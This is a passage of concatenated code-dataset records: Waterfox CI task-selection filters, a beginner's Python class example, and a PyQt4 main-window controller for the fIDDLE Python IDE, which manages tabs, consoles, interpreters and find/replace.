full_task_graph.tasks.iteritems() if filter(t)]\n\n\n@_target_task('cedar_tasks')\ndef target_tasks_cedar(full_task_graph, parameters):\n \"\"\"Target tasks that only run on the cedar branch.\"\"\"\n def filter(task):\n platform = task.attributes.get('build_platform')\n # only select platforms\n if platform not in ('linux64', 'macosx64'):\n return False\n if task.attributes.get('unittest_suite'):\n if not (task.attributes['unittest_suite'].startswith('mochitest') or\n 'xpcshell' in task.attributes['unittest_suite']):\n return False\n return True\n return [l for l, t in full_task_graph.tasks.iteritems() if filter(t)]\n\n\n@_target_task('graphics_tasks')\ndef target_tasks_graphics(full_task_graph, parameters):\n \"\"\"In addition to doing the filtering by project that the 'default'\n filter does, also remove artifact builds because we have csets on\n the graphics branch that aren't on the candidate branches of artifact\n builds\"\"\"\n filtered_for_project = target_tasks_default(full_task_graph, parameters)\n\n def filter(task):\n if task.attributes['kind'] == 'artifact-build':\n return False\n return True\n return [l for l in filtered_for_project if filter(full_task_graph[l])]\n\n\n@_target_task('mochitest_valgrind')\ndef target_tasks_valgrind(full_task_graph, parameters):\n \"\"\"Target tasks that only run on the cedar branch.\"\"\"\n def filter(task):\n platform = task.attributes.get('test_platform', '').split('/')[0]\n if platform not in ['linux64']:\n return False\n\n if task.attributes.get('unittest_suite', '').startswith('mochitest') and \\\n task.attributes.get('unittest_flavor', '').startswith('valgrind-plain'):\n return True\n return False\n\n return [l for l, t in full_task_graph.tasks.iteritems() if filter(t)]\n\n\n@_target_task('nightly_fennec')\ndef target_tasks_nightly_fennec(full_task_graph, parameters):\n \"\"\"Select the set of tasks required for a nightly build of fennec. The\n nightly build process involves a pipeline of builds, signing,\n and, eventually, uploading the tasks to balrog.\"\"\"\n def filter(task):\n platform = task.attributes.get('build_platform')\n if platform in ('android-aarch64-nightly',\n 'android-api-16-nightly',\n 'android-api-16-old-id-nightly',\n 'android-nightly',\n 'android-x86-nightly',\n 'android-x86-old-id-nightly'):\n if not task.attributes.get('nightly', False):\n return False\n return filter_for_project(task, parameters)\n return [l for l, t in full_task_graph.tasks.iteritems() if filter(t)]\n\n\n@_target_task('nightly_linux')\ndef target_tasks_nightly_linux(full_task_graph, parameters):\n \"\"\"Select the set of tasks required for a nightly build of linux. The\n nightly build process involves a pipeline of builds, signing,\n and, eventually, uploading the tasks to balrog.\"\"\"\n def filter(task):\n platform = task.attributes.get('build_platform')\n if platform in ('linux64-nightly', 'linux-nightly'):\n return task.attributes.get('nightly', False)\n return [l for l, t in full_task_graph.tasks.iteritems() if filter(t)]\n\n\n@_target_task('mozilla_beta_tasks')\ndef target_tasks_mozilla_beta(full_task_graph, parameters):\n \"\"\"Select the set of tasks required for a promotable beta or release build\n of linux, plus android CI. The candidates build process involves a pipeline\n of builds and signing, but does not include beetmover or balrog jobs.\"\"\"\n\n def filter(task):\n if not standard_filter(task, parameters):\n return False\n platform = task.attributes.get('build_platform')\n if platform in (\n # On beta, Nightly builds are already PGOs\n 'linux-pgo', 'linux64-pgo',\n 'win32-pgo', 'win64-pgo',\n 'android-api-16-nightly', 'android-x86-nightly'\n ):\n return False\n\n if platform in (\n 'linux', 'linux64',\n 'macosx64',\n 'win32', 'win64',\n ):\n if task.attributes['build_type'] == 'opt' and \\\n task.attributes.get('unittest_suite') != 'talos':\n return False\n\n # skip l10n, beetmover, balrog\n if task.kind in [\n 'balrog',\n 'beetmover', 'beetmover-checksums', 'beetmover-l10n',\n 'beetmover-repackage', 'beetmover-repackage-signing',\n 'checksums-signing',\n 'nightly-l10n', 'nightly-l10n-signing',\n 'push-apk', 'push-apk-breakpoint',\n 'repackage-l10n',\n ]:\n return False\n\n # No l10n repacks per push. They may be triggered by kinds which depend\n # on l10n builds/repacks. For instance: \"repackage-signing\"\n if task.attributes.get('locale', '') != '':\n return False\n\n return True\n\n return [l for l, t in full_task_graph.tasks.iteritems() if filter(t)]\n\n\n@_target_task('mozilla_release_tasks')\ndef target_tasks_mozilla_release(full_task_graph, parameters):\n \"\"\"Select the set of tasks required for a promotable beta or release build\n of linux, plus android CI. The candidates build process involves a pipeline\n of builds and signing, but does not include beetmover or balrog jobs.\"\"\"\n return target_tasks_mozilla_beta(full_task_graph, parameters)\n\n\n@_target_task('candidates_fennec')\ndef target_tasks_candidates_fennec(full_task_graph, parameters):\n \"\"\"Select the set of tasks required for a candidates build of fennec. The\n nightly build process involves a pipeline of builds, signing,\n and, eventually, uploading the tasks to balrog.\"\"\"\n filtered_for_project = target_tasks_nightly_fennec(full_task_graph, parameters)\n\n def filter(task):\n if task.kind not in ['balrog']:\n return task.attributes.get('nightly', False)\n\n return [l for l in filtered_for_project if filter(full_task_graph[l])]\n\n\n@_target_task('pine_tasks')\ndef target_tasks_pine(full_task_graph, parameters):\n \"\"\"Bug 1339179 - no mobile automation needed on pine\"\"\"\n def filter(task):\n platform = task.attributes.get('build_platform')\n # disable mobile jobs\n if str(platform).startswith('android'):\n return False\n # disable asan\n if platform == 'linux64-asan':\n return False\n # disable non-pine and nightly tasks\n if standard_filter(task, parameters):\n return True\n return [l for l, t in full_task_graph.tasks.iteritems() if filter(t)]\n\n\n@_target_task('nightly_macosx')\ndef target_tasks_nightly_macosx(full_task_graph, parameters):\n \"\"\"Select the set of tasks required for a nightly build of macosx. The\n nightly build process involves a pipeline of builds, signing,\n and, eventually, uploading the tasks to balrog.\"\"\"\n def filter(task):\n platform = task.attributes.get('build_platform')\n if platform in ('macosx64-nightly', ):\n return task.attributes.get('nightly', False)\n return [l for l, t in full_task_graph.tasks.iteritems() if filter(t)]\n\n\n@_target_task('nightly_win')\ndef target_tasks_nightly_win(full_task_graph, parameters):\n \"\"\"Select the set of tasks required for a nightly build of win32 and win64.\n The nightly build process involves a pipeline of builds, signing,\n and, eventually, uploading the tasks to balrog.\"\"\"\n def filter(task):\n platform = task.attributes.get('build_platform')\n if not filter_for_project(task, parameters):\n return False\n if platform in ('win32-nightly', 'win64-nightly'):\n return task.attributes.get('nightly', False)\n return [l for l, t in full_task_graph.tasks.iteritems() if filter(t)]\n\n\n@_target_task('nightly_desktop')\ndef target_tasks_nightly_desktop(full_task_graph, parameters):\n \"\"\"Select the set of tasks required for a nightly build of linux, mac,\n windows.\"\"\"\n # Avoid duplicate tasks.\n return list(\n set(target_tasks_nightly_win(full_task_graph, parameters))\n | set(target_tasks_nightly_macosx(full_task_graph, parameters))\n | set(target_tasks_nightly_linux(full_task_graph, parameters))\n )\n\n\n# Opt DMD builds should only run nightly\n@_target_task('nightly_dmd')\ndef target_tasks_dmd(full_task_graph, parameters):\n \"\"\"Target DMD that run nightly on the m-c branch.\"\"\"\n def filter(task):\n platform = task.attributes.get('build_platform', '')\n return platform.endswith('-dmd')\n return [l for l, t in full_task_graph.tasks.iteritems() if filter(t)]\n","repo_name":"WaterfoxCo/Waterfox-Classic","sub_path":"taskcluster/taskgraph/target_tasks.py","file_name":"target_tasks.py","file_ext":"py","file_size_in_byte":14894,"program_lang":"python","lang":"en","doc_type":"code","stars":160,"dataset":"github-code","pt":"71"} +{"seq_id":"6771065367","text":"class point():\n # now we need to make a constructor\n # all the functions or methods that operate on objs take first arguments as self whic represents\n # the object in Question\n # basically self refernces the obj we are dealing with\n def __init__(self, input1, input2):\n self.x = input1\n self.y = input2\n\n\np = point(2, 9)\nprint(p.x)\nprint(p.y)\n","repo_name":"Samarjeet09/WebDev","sub_path":"3.PYTHON/13)class.py","file_name":"13)class.py","file_ext":"py","file_size_in_byte":373,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"2279491763","text":"import urllib.parse\n\n# Import Qt modules\nfrom PyQt4 import QtCore, QtGui\n\n# Import application modules\nfrom fiddle import __version__\nfrom fiddle.views.MainWindow import Ui_MainWindow\nfrom fiddle.controllers.FiddleTabWidget import FiddleTabWidget, FiddleTabFile\nfrom fiddle.controllers.PyConsole import PyConsoleTextBrowser\nfrom fiddle.controllers.ManageInterpretersDialog import ManageInterpretersDialog\nfrom fiddle.config import *\nfrom fiddle.helpers.builtins import *\n\n# Set up the logger\nlogger = logging.getLogger(__name__)\n\n\nclass MainWindow(QtGui.QMainWindow):\n def __init__(self, app=None, files=None):\n super(MainWindow, self).__init__()\n\n self.app = app\n\n self.ui = Ui_MainWindow()\n self.ui.setupUi(self)\n\n self.setWindowTitle(WINDOW_TITLE)\n\n # Initialize actions\n self.init_actions()\n\n # Initialize statusbar\n self.lbl_pyversion = None\n self.lbl_current_position = None\n self.lbl_encoding = None\n self.init_statusbar()\n\n # Hide the help pane\n self.ui.helpPane.hide()\n\n # Hide the Find/Replace frame\n self.ui.findPane.hide()\n\n # Initialize Find/Replace\n self.init_find_replace_events()\n\n # Initialize interpreters\n self.current_interpreter = CONSOLE_PYTHON['path']\n self.current_interpreter_dir = CONSOLE_PYTHON_DIR\n self.interpreters = []\n self.init_interpreters()\n\n # Initialize Python console\n self.pyconsole_output = PyConsoleTextBrowser(self)\n self.ui.pyConsoleLayout.insertWidget(0, self.pyconsole_output)\n self.pyconsole_output.anchorClicked.connect(self.load_anchor)\n self.pyconsole_process = None\n self.help_process = None\n self.pyconsole_pyversion = None # stores a tuple of the system Python's version\n self.start_pyconsole_process()\n self.start_pyconsole_help()\n\n # Console text formats\n self.base_format = None\n self.error_format = None\n self.info_format = None\n self.init_console_text_formats()\n\n # Initialize run script console\n self.runscript_console = PyConsoleTextBrowser(self)\n self.ui.runScriptLayout.insertWidget(1, self.runscript_console)\n self.runscript_console.anchorClicked.connect(self.load_anchor)\n self.runscript_process = None\n self.runscript_tab = None\n\n # Initialize the search providers\n self.search_url = ''\n self.init_search_providers()\n\n # Initialize the TabWidget\n self.documents_tabWidget = FiddleTabWidget(self)\n self.ui.centralLayout.insertWidget(0, self.documents_tabWidget)\n self.documents_tabWidget.tabCloseRequested.connect(self.close_tab)\n self.documents_tabWidget.currentChanged.connect(self.handle_tab_change)\n\n # Initialize recent files\n self.recent_files = []\n self.init_open_recent()\n\n # Load any files/dirs passed on the command line\n self.init_load_files(files)\n\n def closeEvent(self, event):\n event.ignore()\n if self.close_all_tabs():\n event.accept()\n self.terminate_pyconsole_process(timeout=1000)\n self.terminate_current_script(timeout=1000)\n self.terminate_pyconsole_help(timeout=1000)\n\n def stop(self):\n pass\n\n def init_load_files(self, paths):\n \"\"\"\n Given a list of paths, open all the files found. If a path is a directory then open all the files in that\n directory.\n\n :param list paths:\n :return:\n \"\"\"\n if paths is not None and len(paths) > 0:\n # Open all the files\n for path in paths:\n if os.path.isfile(path):\n self.open_filepath(path)\n elif os.path.isdir(path):\n for item in os.listdir(path):\n ipath = os.path.join(path, item)\n if os.path.isfile(ipath):\n self.open_filepath(ipath)\n else:\n # Add a blank file\n self.new_file()\n\n def init_actions(self):\n # File actions\n self.ui.actionNew.triggered.connect(self.new_file)\n self.ui.actionOpen.triggered.connect(self.open_file)\n self.ui.actionSave_File.triggered.connect(self.save_file)\n self.ui.actionSave_File_As.triggered.connect(self.save_file_as)\n self.ui.actionPrint.triggered.connect(self.print_file)\n self.ui.actionClose_Tab.triggered.connect(self.close_current_tab)\n self.ui.actionClose_All_Tabs.triggered.connect(self.close_all_tabs)\n self.ui.actionExit.triggered.connect(self.exit_app)\n\n # Edit actions\n self.ui.actionCut.triggered.connect(self.edit_cut)\n self.ui.actionCopy.triggered.connect(self.edit_copy)\n self.ui.actionPaste.triggered.connect(self.edit_paste)\n self.ui.actionSelect_All.triggered.connect(self.edit_select_all)\n self.ui.actionFind.triggered.connect(self.find_in_file)\n self.ui.actionFind_and_Replace.triggered.connect(self.replace_in_file)\n\n # View actions\n self.ui.actionZoom_In.triggered.connect(self.zoom_in_text)\n self.ui.actionZoom_Out.triggered.connect(self.zoom_out_text)\n self.ui.actionWord_Wrap.triggered.connect(self.set_editors_wordwrap)\n self.ui.actionShow_Whitespace.triggered.connect(self.set_editors_whitespace)\n self.ui.actionShow_End_of_Line.triggered.connect(self.set_editors_eolchars)\n\n # Code actions\n self.ui.actionClean_Code.triggered.connect(self.clean_current_editor)\n self.ui.actionCheck_Code.triggered.connect(self.check_current_editor)\n\n # Console actions\n self.ui.actionShow_Console.triggered.connect(self.toggle_console)\n self.ui.actionRestart_Console.triggered.connect(self.restart_pyconsole_process)\n self.ui.actionHalt_Python_Console.triggered.connect(self.terminate_pyconsole_process)\n self.ui.actionRun_Current_Script.triggered.connect(self.run_current_script)\n self.ui.actionHalt_Current_Script.triggered.connect(self.terminate_current_script)\n\n # Help actions\n self.ui.actionShow_Help_Pane.triggered.connect(self.toggle_help_pane)\n self.ui.actionAbout_fIDDEL.triggered.connect(self.show_about_fiddle)\n #self.ui.actionFIDDLE_Help.triggered.connect() # TODO: Create\n\n def init_search_providers(self):\n ag = QtGui.QActionGroup(self)\n ag.setExclusive(True)\n for item in HELP_WEB_SEARCH_SOURCES:\n a = QtGui.QAction(self)\n a.setData(item)\n a.setText(item['name'])\n a.setCheckable(True)\n a.triggered.connect(self.set_search_provider)\n ag.addAction(a)\n self.ui.menuSearch_Provider.addAction(a)\n if item['name'] == HELP_WEB_SEARCH_SOURCES[0]['name']:\n a.trigger()\n\n def init_interpreters(self):\n self.ui.menuPython_Interpreter.clear()\n # Add the default actions\n a_manage = QtGui.QAction(self)\n a_manage.setText(self.tr('Manage Interpreters'))\n a_manage.triggered.connect(self.show_manage_interpreters)\n self.ui.menuPython_Interpreter.addAction(a_manage)\n self.ui.menuPython_Interpreter.addSeparator()\n # Add the available interpreters\n ag = QtGui.QActionGroup(self)\n ag.setExclusive(True)\n # Set default interpreter\n a = QtGui.QAction(self)\n a.setData(CONSOLE_PYTHON)\n a.setText(self.tr('(Default) {0}'.format(CONSOLE_PYTHON['path'])))\n a.setCheckable(True)\n a.setChecked(True)\n a.triggered.connect(self.set_current_interpreter)\n ag.addAction(a)\n self.ui.menuPython_Interpreter.addAction(a)\n # Add additional interpreters\n for item in CONSOLE_PYTHON_INTERPRETERS:\n a = QtGui.QAction(self)\n a.setData(item)\n if item['virtualenv']:\n a.setText(self._elide_filepath(os.path.dirname(item['path']), threshold=50, margin=10))\n else:\n if PLATFORM == 'win32':\n a.setText(os.path.dirname(item['path']))\n else:\n a.setText(item['path'])\n a.setCheckable(True)\n a.triggered.connect(self.set_current_interpreter)\n ag.addAction(a)\n self.ui.menuPython_Interpreter.addAction(a)\n\n def init_open_recent(self):\n if os.path.exists('.recent'):\n with open('.recent') as fp:\n self.recent_files = fp.readlines()\n self.create_recent_files_menu()\n\n def init_console_text_formats(self):\n # Base format (defined in Qt Designer)\n self.base_format = self.pyconsole_output.currentCharFormat()\n self.base_format.setForeground(QtGui.QColor(CONSOLE_COLOR_BASE))\n\n # Error format for data on stderr\n self.error_format = QtGui.QTextCharFormat(self.base_format)\n self.error_format.setForeground(QtGui.QColor(CONSOLE_COLOR_ERROR))\n\n # Info format for data\n self.info_format = QtGui.QTextCharFormat(self.base_format)\n self.info_format.setForeground(QtGui.QColor(CONSOLE_COLOR_INFO))\n\n def init_statusbar(self):\n # Statusbar\n # you can't add widgets to status bar in Qt Designer, so do it here\n self.lbl_pyversion = QtGui.QLabel()\n self.lbl_pyversion.setMargin(5)\n self.ui.statusbar.addPermanentWidget(self.lbl_pyversion)\n self.lbl_pyversion.setText(\"\")\n\n self.lbl_encoding = QtGui.QLabel()\n self.lbl_encoding.setMargin(5)\n self.lbl_encoding.setToolTip(self.tr('File encoding'))\n self.ui.statusbar.insertPermanentWidget(0, self.lbl_encoding)\n self.lbl_encoding.setText('UTF-8')\n\n self.lbl_current_position = QtGui.QLabel()\n self.lbl_current_position.setMargin(5)\n self.lbl_current_position.setToolTip(self.tr('Line no.:Column no.'))\n self.ui.statusbar.insertPermanentWidget(0, self.lbl_current_position)\n self.lbl_current_position.setText('0:0')\n\n def init_find_replace_events(self):\n # http://stackoverflow.com/questions/23076698/pyside-select-all-text-when-qlineedit-gets-focus\n # Focusing on the widgets selects all the text (e.g. tabbing in)\n self.ui.find_text_lineEdit.focusInEvent = lambda _: self.ui.find_text_lineEdit.selectAll()\n self.ui.replace_text_lineEdit.focusInEvent = lambda _: self.ui.replace_text_lineEdit.selectAll()\n\n # Clicking on the widgets select all the text\n self.ui.find_text_lineEdit.mousePressEvent = lambda _: self.ui.find_text_lineEdit.selectAll()\n self.ui.replace_text_lineEdit.mousePressEvent = lambda _: self.ui.replace_text_lineEdit.selectAll()\n\n def set_current_interpreter(self):\n action = self.sender()\n item = action.data()\n if os.path.exists(item['path']):\n self.current_interpreter = os.path.normpath(item['path'])\n self.current_interpreter_dir = os.path.dirname(self.current_interpreter)\n self.restart_pyconsole_process()\n self.restart_pyconsole_help()\n idx = self.documents_tabWidget.currentIndex()\n self.handle_tab_change(idx)\n else:\n self.ui.statusbar.showMessage(self.tr('No Python executable at {0}').format(item['path']), 5000)\n\n def start_pyconsole_process(self):\n if self.pyconsole_process is None:\n # Create a shell process\n self.pyconsole_process = QtCore.QProcess(self.app)\n self.pyconsole_process.setWorkingDirectory(self.current_interpreter_dir)\n self.pyconsole_process.readyReadStandardError.connect(self.process_console_stderr)\n self.pyconsole_process.readyReadStandardOutput.connect(self.process_console_stdout)\n self.pyconsole_process.finished.connect(self.process_console_finished)\n self.pyconsole_output.process = self.pyconsole_process\n else:\n self.terminate_pyconsole_process()\n # Clear any version information\n self.pyconsole_pyversion = None\n # Start the interactive console\n self.pyconsole_process.start(self.current_interpreter, ['-i']) # -i makes sure InteractiveConsole is started\n\n def restart_pyconsole_process(self):\n self.app.setOverrideCursor(QtCore.Qt.WaitCursor)\n self.terminate_pyconsole_process()\n self.pyconsole_output.clear()\n self.start_pyconsole_process()\n self.app.restoreOverrideCursor()\n\n def terminate_pyconsole_process(self, timeout=5000):\n if self.pyconsole_process is not None and self.pyconsole_process.state() > 0:\n self.print_data_to_pyconsole('\\n', self.info_format)\n self.print_data_to_pyconsole(self.tr('Python console is terminating...'), self.info_format)\n self.pyconsole_output.repaint() # Force message to show\n self.pyconsole_process.write('exit()\\n')\n self.pyconsole_process.close()\n if PLATFORM == 'win32':\n self.pyconsole_process.kill()\n else:\n self.pyconsole_process.terminate()\n if not self.pyconsole_process.waitForFinished(timeout):\n self.pyconsole_process.kill()\n\n def start_pyconsole_help(self):\n if self.help_process is None:\n # Create a shell process\n self.help_process = QtCore.QProcess(self.app)\n self.help_process.setWorkingDirectory(self.current_interpreter_dir)\n self.help_process.readyReadStandardError.connect(self.process_help_stderr)\n self.help_process.readyReadStandardOutput.connect(self.process_help_stdout)\n self.help_process.finished.connect(self.process_help_finished)\n else:\n self.terminate_pyconsole_help()\n # Start the pydoc help server\n self.help_process.start(self.current_interpreter, ['-m', 'pydoc', '-p', str(CONSOLE_HELP_PORT)])\n\n def restart_pyconsole_help(self):\n self.app.setOverrideCursor(QtCore.Qt.WaitCursor)\n self.terminate_pyconsole_help()\n self.runscript_console.clear()\n self.start_pyconsole_help()\n self.app.restoreOverrideCursor()\n\n def terminate_pyconsole_help(self, timeout=5000):\n if self.help_process is not None and self.help_process.state() > 0:\n self.print_data_to_runconsole('\\n', self.info_format)\n self.print_data_to_runconsole(self.tr('Python console is terminating...'), self.info_format)\n self.runscript_console.repaint() # Force message to show\n self.help_process.close()\n if PLATFORM == 'win32':\n self.help_process.kill()\n else:\n self.help_process.terminate()\n if not self.help_process.waitForFinished(timeout):\n self.help_process.kill()\n\n def run_current_script(self):\n if self.runscript_process is None:\n # Create a shell process\n self.runscript_process = QtCore.QProcess(self.app)\n self.runscript_process.setWorkingDirectory(self.runscript_tab.basepath)\n self.runscript_process.readyReadStandardError.connect(self.process_runscript_stderr)\n self.runscript_process.readyReadStandardOutput.connect(self.process_runscript_stdout)\n self.runscript_process.finished.connect(self.process_runscript_finished)\n self.runscript_console.process = self.runscript_process\n else:\n self.terminate_current_script()\n # Show the run tab\n self.ui.console_tabWidget.show()\n self.ui.console_tabWidget.setCurrentIndex(1)\n # Clear the output\n self.runscript_console.clear()\n # Run the script in the process\n if not os.path.isfile(self.runscript_tab.filepath) or not self.runscript_tab.saved:\n self.runscript_tab.save()\n self.set_current_run_command(self.runscript_tab) # Update the command to the saved location\n command = self.ui.runScript_command.text()\n self.runscript_process.start(command)\n\n def terminate_current_script(self, timeout=2000):\n if self.runscript_process is not None and self.runscript_process.state() > 0:\n self.print_data_to_runconsole('\\n', self.info_format)\n self.print_data_to_runconsole(self.tr('Script is terminating...'), self.info_format)\n self.runscript_console.repaint() # Force message to show\n self.app.setOverrideCursor(QtCore.Qt.WaitCursor)\n self.runscript_process.close()\n if PLATFORM == 'win32':\n self.runscript_process.kill()\n else:\n self.runscript_process.terminate()\n if not self.runscript_process.waitForFinished(timeout):\n self.runscript_process.kill()\n self.app.restoreOverrideCursor()\n\n def create_tab(self, filepath=None):\n tab = FiddleTabFile(parent=self.documents_tabWidget, filepath=filepath)\n tab.editor_changed.connect(self.update_tab_title)\n tab.cursor_changed.connect(self.update_cursor_position)\n tab.find_wrapped.connect(self.handle_find_wrapped)\n return tab\n\n def new_file(self):\n tab = self.create_tab()\n tabname = tab.filename if tab.saved else tab.filename + ' *'\n idx = self.documents_tabWidget.addTab(tab, tabname)\n self.documents_tabWidget.setCurrentIndex(idx)\n if self.ui.actionWord_Wrap.isChecked():\n tab.editor.wordwrap =True\n if self.ui.actionShow_End_of_Line.isChecked():\n tab.editor.eolchars = True\n if self.ui.actionShow_Whitespace.isChecked():\n tab.editor.whitespace = True\n\n def open_file(self):\n tab = self.documents_tabWidget.currentWidget()\n filepath = QtGui.QFileDialog.getOpenFileName(None,\n None,\n os.path.expanduser('~') if tab is None else tab.basepath,\n ';;'.join(FILE_TYPES))\n if filepath != '':\n self.open_filepath(filepath)\n self.update_recent_files(filepath)\n\n def open_filepath(self, filepath):\n if not os.path.exists(filepath):\n self.ui.statusbar.showMessage(self.tr('No file at {0}').format(filepath), 5000)\n return None\n\n if filepath is not '' and not None:\n tab = self.create_tab(filepath)\n if os.path.normcase(CONSOLE_PYTHON_DIR) in os.path.normcase(filepath):\n # Give users a hint they may be editing a system file by changing background color\n tab.editor.lexer.setPaper(QtGui.QColor(EDITOR_CARET_LINE_COLOR))\n idx = self.documents_tabWidget.addTab(tab, tab.filename)\n self.documents_tabWidget.setCurrentIndex(idx)\n self.documents_tabWidget.setTabToolTip(idx, filepath)\n if self.ui.actionWord_Wrap.isChecked():\n tab.editor.wordwrap =True\n if self.ui.actionShow_End_of_Line.isChecked():\n tab.editor.eolchars = True\n if self.ui.actionShow_Whitespace.isChecked():\n tab.editor.whitespace = True\n return tab\n else:\n return None\n\n def open_recent_filepath(self):\n action = self.sender()\n if action:\n self.open_filepath(action.data())\n\n def update_recent_files(self, filepath):\n \"\"\"\n Save file path to recent files, truncating to 10 files and removing duplicates.\n\n :param str filepath:\n :return:\n \"\"\"\n try:\n self.recent_files.append(filepath)\n except AttributeError:\n self.recent_files = []\n self.recent_files.append(filepath)\n # Remove duplicates\n seen = []\n filtered = []\n for item in self.recent_files:\n if item in seen:\n continue\n seen.append(item)\n filtered.append(item)\n with open('.recent', 'w') as fp:\n if len(filtered) > 10:\n fp.write('\\n'.join(filtered[-10:]))\n else:\n fp.write('\\n'.join(filtered))\n self.create_recent_files_menu()\n\n def create_recent_files_menu(self):\n self.ui.menuOpen_Recent.clear()\n for filepath in reversed(self.recent_files):\n sfp = filepath.strip()\n if sfp != '':\n a = QtGui.QAction(self.ui.menuOpen_Recent)\n a.setText(self._elide_filepath(sfp, threshold=50, margin=10))\n a.setData(sfp)\n a.triggered.connect(self.open_recent_filepath)\n self.ui.menuOpen_Recent.addAction(a)\n\n def save_file(self):\n idx = self.documents_tabWidget.currentIndex()\n tab = self.documents_tabWidget.widget(idx)\n tab.save()\n self.documents_tabWidget.setTabToolTip(idx, tab.filepath)\n self.handle_tab_change(idx)\n\n def save_file_as(self):\n idx = self.documents_tabWidget.currentIndex()\n tab = self.documents_tabWidget.widget(idx)\n tab.save_as()\n self.documents_tabWidget.setTabToolTip(idx, tab.filepath)\n self.handle_tab_change(idx)\n\n def print_file(self):\n pass\n\n def exit_app(self):\n self.close()\n\n def edit_cut(self):\n try:\n cw = self.app.focusWidget()\n cw.cut()\n except AttributeError:\n pass\n\n def edit_copy(self):\n try:\n cw = self.app.focusWidget()\n cw.copy()\n except AttributeError:\n pass\n\n def edit_paste(self):\n try:\n cw = self.app.focusWidget()\n cw.paste()\n except AttributeError:\n pass\n\n def edit_select_all(self):\n try:\n cw = self.app.focusWidget()\n cw.selectAll()\n except AttributeError:\n pass\n\n def close_current_tab(self):\n idx = self.documents_tabWidget.currentIndex()\n return self.close_tab(idx)\n\n def close_all_tabs(self):\n for i in range(self.documents_tabWidget.count()):\n if not self.close_tab(0):\n return False\n return True\n\n def close_tab(self, idx):\n # removing the tab doesn't get the widget, so we need to get that first...\n widget = self.documents_tabWidget.widget(idx)\n # needs saving?\n if not widget.saved and widget.basepath is not None:\n if not self._save_tab_dialog(widget):\n # User canceled close action\n return False\n # remove it\n self.documents_tabWidget.removeTab(idx)\n # ...then delete it\n widget.deleteLater()\n return True\n\n def zoom_in_text(self):\n try:\n cw = self.app.focusWidget()\n if isinstance(cw, QtGui.QAbstractScrollArea):\n cw.zoomIn(1)\n except AttributeError:\n pass\n\n def zoom_out_text(self):\n try:\n cw = self.app.focusWidget()\n if isinstance(cw, QtGui.QAbstractScrollArea):\n cw.zoomOut(1)\n except AttributeError:\n pass\n\n def set_editors_wordwrap(self, state):\n \"\"\"\n Set the display of the word wrap in all the editors.\n\n :param bool state:\n :return:\n\n See QsiScinitilla.setWrapMode()\n \"\"\"\n for i in range(self.documents_tabWidget.count()):\n tab = self.documents_tabWidget.widget(i)\n tab.editor.wordwrap = state\n\n def set_editors_whitespace(self, state):\n \"\"\"\n Set the display of the whitespace characters in all the editors.\n\n :param bool state:\n :return:\n\n See QsiScinitilla.setEolVisibility()\n \"\"\"\n for i in range(self.documents_tabWidget.count()):\n tab = self.documents_tabWidget.widget(i)\n tab.editor.whitespace = state\n\n def set_editors_eolchars(self, state):\n \"\"\"\n Set the display of the end-of-line characters in all the editors\n\n :param bool state:\n :return:\n\n See QsiScinitilla.setWhitespaceVisibility()\n \"\"\"\n for i in range(self.documents_tabWidget.count()):\n tab = self.documents_tabWidget.widget(i)\n tab.editor.eolchars = state\n\n def clean_current_editor(self):\n \"\"\"\n Run the `clean_code` function in the currenly displayed editor widget.\n\n :return:\n \"\"\"\n self.app.setOverrideCursor(QtCore.Qt.WaitCursor)\n tab = self.documents_tabWidget.currentWidget()\n tab.editor.clean_code()\n self.app.restoreOverrideCursor()\n\n def check_current_editor(self):\n \"\"\"\n Run the `check_code` function in the currently displayed editor widget.\n\n :return:\n \"\"\"\n self.app.setOverrideCursor(QtCore.Qt.WaitCursor)\n tab = self.documents_tabWidget.currentWidget()\n tab.editor.check_code(tab.filepath)\n self.app.restoreOverrideCursor()\n\n def toggle_help_pane(self):\n if self.ui.helpBrowser.url().path() == 'blank':\n src = QtCore.QUrl('http://{0}:{1}/'.format(CONSOLE_HOST, CONSOLE_HELP_PORT))\n self.ui.helpBrowser.setUrl(src)\n if self.ui.helpPane.isVisible():\n self.ui.helpPane.hide()\n else:\n self.ui.helpPane.show()\n self.ui.helpSearch.selectAll()\n self.ui.helpSearch.setFocus()\n\n def toggle_console(self):\n if self.ui.consolePane.isHidden():\n self.ui.consolePane.show()\n else:\n self.ui.consolePane.hide()\n\n def set_search_provider(self):\n action = self.sender()\n data = action.data()\n self.search_url = data['query_tmpl']\n self.ui.searchProvider_label.setText(data['name'])\n\n def show_about_fiddle(self):\n message_box = QtGui.QMessageBox(self)\n message_box.setWindowTitle(self.tr('About fIDDLE'))\n message_box.setIconPixmap(QtGui.QPixmap(\":/logos/logos/fiddle_logo_64.png\"))\n message_box.setText('Version {0}'.format(__version__))\n message_box.setInformativeText(ABOUT_FIDDLE)\n ok_btn = message_box.addButton(QtGui.QMessageBox.Ok)\n message_box.setDefaultButton(ok_btn)\n message_box.exec_()\n\n def show_manage_interpreters(self):\n \"\"\"\n Display the Manage Interpreters dialog and save any changes if the Save button in clicked.\n\n :return:\n \"\"\"\n dialog = ManageInterpretersDialog(self)\n ret = dialog.exec_()\n if ret == QtGui.QDialog.Accepted:\n with open('interpreters.json', 'w') as fp:\n CONSOLE_PYTHON_INTERPRETERS = dialog.temp_interpreters\n json.dump(CONSOLE_PYTHON_INTERPRETERS, fp)\n self.init_interpreters()\n\n def find_in_file(self):\n if self.ui.findPane.isHidden():\n self.ui.findPane.show()\n \n self.ui.find_text_lineEdit.setFocus()\n self.ui.find_text_lineEdit.selectAll()\n\n current_doc = self.documents_tabWidget.currentWidget()\n if self.ui.find_text_lineEdit.text() == '':\n self.ui.find_text_lineEdit.setText(current_doc.editor.selectedText())\n if current_doc is not None:\n current_doc.find_text(self.ui.find_text_lineEdit.text(),\n self.ui.find_re_checkBox.isChecked(),\n self.ui.find_case_checkBox.isChecked(),\n self.ui.find_word_checkBox.isChecked(),\n self.ui.find_wrap_checkBox.isChecked(),\n self.ui.find_selection_checkBox.isChecked())\n\n def find_in_file_previous(self):\n current_doc = self.documents_tabWidget.currentWidget()\n if self.ui.find_text_lineEdit.text() == '':\n self.ui.find_text_lineEdit.setText(current_doc.editor.selectedText())\n if current_doc is not None:\n current_doc.find_text(self.ui.find_text_lineEdit.text(),\n self.ui.find_re_checkBox.isChecked(),\n self.ui.find_case_checkBox.isChecked(),\n self.ui.find_word_checkBox.isChecked(),\n self.ui.find_wrap_checkBox.isChecked(),\n self.ui.find_selection_checkBox.isChecked(),\n forward=False)\n\n def replace_in_file(self):\n if self.ui.findPane.isHidden():\n self.ui.findPane.show()\n self.ui.find_text_lineEdit.setFocus()\n\n current_doc = 